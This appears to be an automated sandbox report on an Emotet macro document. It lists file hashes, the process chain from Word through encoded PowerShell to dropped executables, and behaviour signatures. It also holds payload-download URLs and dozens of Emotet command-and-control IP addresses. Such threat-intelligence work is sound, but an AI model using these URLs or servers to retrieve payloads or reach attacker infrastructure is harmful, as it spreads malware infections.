Analysis
- max time kernel: 137s
- max time network: 149s
- platform: windows10_x64
- resource: win10v200722
- submitted: 29-07-2020 00:13
- Static task: static1
- Behavioral task: behavioral1
- Sample: emotet_e3_815a79a9d7ce70977948ef24171dac2cc41dd3a3d494f2b95eb9b08c355bb5e1_2020-07-29__001342._doc.doc
- Resource: win7
General
- Target: emotet_e3_815a79a9d7ce70977948ef24171dac2cc41dd3a3d494f2b95eb9b08c355bb5e1_2020-07-29__001342._doc.doc
- Size: 169KB
- MD5: 0844a5ac279d31e0d7915770bdebe16e
- SHA1: 08febfb1becbf3d793ac8c61a7640d4f76f80f34
- SHA256: 815a79a9d7ce70977948ef24171dac2cc41dd3a3d494f2b95eb9b08c355bb5e1
- SHA512: 66fab8a4dc956cfb2fbd2b17758b3c7ab274e638403124603b7dfef9c59dbff9aed91d8c4f81c3d31a2c8a3eedead4ed16af81695fc2e2bb16dea8c43fbe8565
Malware Config
Extracted (URLs):
https://mossfs.com.au/wp-content/fVrTuWOb/
https://rtisistemas.com.br/jdetsob/Ov3a8106w4g7x17030547/
http://slbqms.co.ls/cgi-bin/CHrsuXU/
http://sertcom.net/_vti_bin/LiUoBmTHW/
http://skpsoft.com/wp-admin/YnsFh/
Extracted (family: emotet):
177.37.81.212:443
74.207.230.187:8080
190.164.75.175:80
87.252.100.28:80
105.209.239.55:80
163.172.107.70:8080
37.208.106.146:8080
24.157.25.203:80
212.112.113.235:80
140.207.113.106:443
75.139.38.211:80
192.210.217.94:8080
46.49.124.53:80
75.127.14.170:8080
87.106.231.60:8080
139.59.12.63:8080
181.167.35.84:80
201.214.108.231:80
74.208.173.91:8080
189.146.1.78:443
212.156.133.218:80
37.70.131.107:80
181.113.229.139:443
144.139.91.187:80
50.116.78.109:8080
46.32.229.152:8080
80.211.32.88:8080
157.7.164.178:8081
113.161.148.81:80
37.46.129.215:8080
216.75.37.196:8080
78.188.170.128:80
192.241.220.183:8080
77.74.78.80:443
81.214.253.80:443
45.118.136.92:8080
113.160.180.109:80
143.95.101.72:8080
181.143.101.19:8080
190.111.215.4:8080
192.163.221.191:8080
203.153.216.182:7080
46.105.131.68:8080
177.144.130.105:443
51.38.201.19:7080
190.55.233.156:80
181.134.9.162:80
178.33.167.120:8080
41.185.29.128:8080
78.189.111.208:443
181.164.110.7:80
203.153.216.178:7080
115.79.195.246:80
195.201.56.70:8080
179.5.118.12:80
185.142.236.163:443
91.83.93.103:443
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
- description: Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process; pid: 2044; pid_target: 500; process: powersheLL.exe

Suspicious behavior: EnumeratesProcesses (9 IoCs)
Processes:
- pid 2044, powersheLL.exe (3 IoCs)
- pid 3320, openfiles.exe (6 IoCs)

Suspicious use of WriteProcessMemory (3 IoCs)
Processes:
- description: PID 3860 wrote to memory of 3320; pid: 3860; process: 49.exe; target process: openfiles.exe (3 IoCs)

Emotet Payload (2 IoCs)
Detects Emotet payload in memory.
Processes:
- resource: behavioral2/memory/3860-8-0x0000000000650000-0x000000000065C000-memory.dmp; yara_rule: emotet
- resource: behavioral2/memory/3320-11-0x00000000005A0000-0x00000000005AC000-memory.dmp; yara_rule: emotet

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
- description: Key opened; ioc: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0; process: WINWORD.EXE
- description: Key value queried; ioc: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz; process: WINWORD.EXE
- description: Key value queried; ioc: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString; process: WINWORD.EXE

Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes:
- description: Key value queried; ioc: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU; process: WINWORD.EXE
- description: Key opened; ioc: \REGISTRY\MACHINE\Hardware\Description\System\BIOS; process: WINWORD.EXE
- description: Key value queried; ioc: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily; process: WINWORD.EXE

Suspicious use of SetWindowsHookEx (15 IoCs)
Processes:
- pid 3952, WINWORD.EXE (11 IoCs)
- pid 3860, 49.exe (2 IoCs)
- pid 3320, openfiles.exe (2 IoCs)

Suspicious behavior: AddClipboardFormatListener (2 IoCs)
Processes:
- pid 3952, WINWORD.EXE (2 IoCs)

Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes:
- description: Token: SeDebugPrivilege; pid: 2044; process: powersheLL.exe

Blacklisted process makes network request (1 IoC)
Processes:
- flow: 14; pid: 2044; process: powersheLL.exe

Executes dropped EXE (2 IoCs)
Processes:
- pid 3860, 49.exe
- pid 3320, openfiles.exe

Drops file in System32 directory (1 IoC)
Processes:
- description: File opened for modification; ioc: C:\Windows\SysWOW64\CastingShellExt\openfiles.exe; process: 49.exe
Processes
- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e3_815a79a9d7ce70977948ef24171dac2cc41dd3a3d494f2b95eb9b08c355bb5e1_2020-07-29__001342._doc.doc" /o ""
  Signatures:
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious use of SetWindowsHookEx
  - Suspicious behavior: AddClipboardFormatListener
- C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
  Command line: powersheLL -e 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
  Signatures:
  - Process spawned unexpected child process
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Blacklisted process makes network request
- C:\Users\Admin\49.exe
  Command line: C:\Users\Admin\49.exe
  Signatures:
  - Suspicious use of WriteProcessMemory
  - Suspicious use of SetWindowsHookEx
  - Executes dropped EXE
  - Drops file in System32 directory
- C:\Windows\SysWOW64\CastingShellExt\openfiles.exe
  Command line: "C:\Windows\SysWOW64\CastingShellExt\openfiles.exe"
  Signatures:
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - Executes dropped EXE
Downloads
- C:\Users\Admin\49.exe
- C:\Users\Admin\49.exe
- C:\Windows\SysWOW64\CastingShellExt\openfiles.exe
- memory/3320-9-0x0000000000000000-mapping.dmp
- memory/3320-11-0x00000000005A0000-0x00000000005AC000-memory.dmp (Filesize: 48KB)
- memory/3860-8-0x0000000000650000-0x000000000065C000-memory.dmp (Filesize: 48KB)
- memory/3952-1-0x0000019FD4F55000-0x0000019FD4F66000-memory.dmp (Filesize: 68KB)
- memory/3952-2-0x0000019FD4F55000-0x0000019FD4F66000-memory.dmp (Filesize: 68KB)
- memory/3952-3-0x0000019FD4F55000-0x0000019FD4F66000-memory.dmp (Filesize: 68KB)